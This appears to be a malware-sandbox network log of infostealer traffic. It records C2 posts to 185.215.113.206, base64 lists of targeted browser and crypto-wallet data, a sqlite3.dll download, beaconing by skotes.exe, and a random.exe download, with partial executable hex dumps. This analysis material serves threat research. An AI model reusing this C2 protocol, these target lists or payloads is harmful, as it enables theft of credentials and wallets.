                                                                                                                                                                                                                                                          Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.410797119 CET1020INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                          Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.412019968 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBK
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 267
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="message"plugins------GIEBAECAKKFCBFIEGCBK--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854259014 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:26 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Content-Length: 7116
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854394913 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                          Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854410887 CET1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                                          Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854923964 CET1236INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                                                                                                                                                                                                          Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854938984 CET1236INData Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58
                                                                                                                                                                                                                                                          Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854954004 CET1164INData Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57
                                                                                                                                                                                                                                                          Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.921013117 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 268
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="message"fplugins------GIEHIDHJDBFIIECAKECB--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.360467911 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:27 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Content-Length: 108
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                          Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.384354115 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDA
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 5735
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.384397984 CET5735OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34
                                                                                                                                                                                                                                                          Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.517015934 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:27 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.779292107 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354298115 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:29 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                          ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Content-Length: 1106998
                                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354320049 CET1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354446888 CET1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                                                                                                                                                                                          Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354460001 CET1236INData Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31
                                                                                                                                                                                                                                                          Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          4192.168.2.449741185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.977972031 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 65 31 3d 31 30 31 37 36 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                          Data Ascii: e1=1017623001&unit=246122658369
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.452397108 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:30 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          5192.168.2.44974331.41.244.11806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:30.591535091 CET61OUTGET /files/martin/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.279704094 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:31 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 4450816
                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 11:46:36 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "6764079c-43ea00"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9f 99 62 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 44 49 00 00 24 6c 00 00 32 00 00 00 a0 bd 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 bd 00 00 04 00 00 15 98 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 69 00 73 00 00 00 00 80 69 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 84 bd 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 83 bd 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELbg(DI$l2`I@D@ _isiL piH(@.rsrciX(@.idata iZ(@ 8i\(@souunsyzp f^(@zkkgfegkC@.taggant0"C@
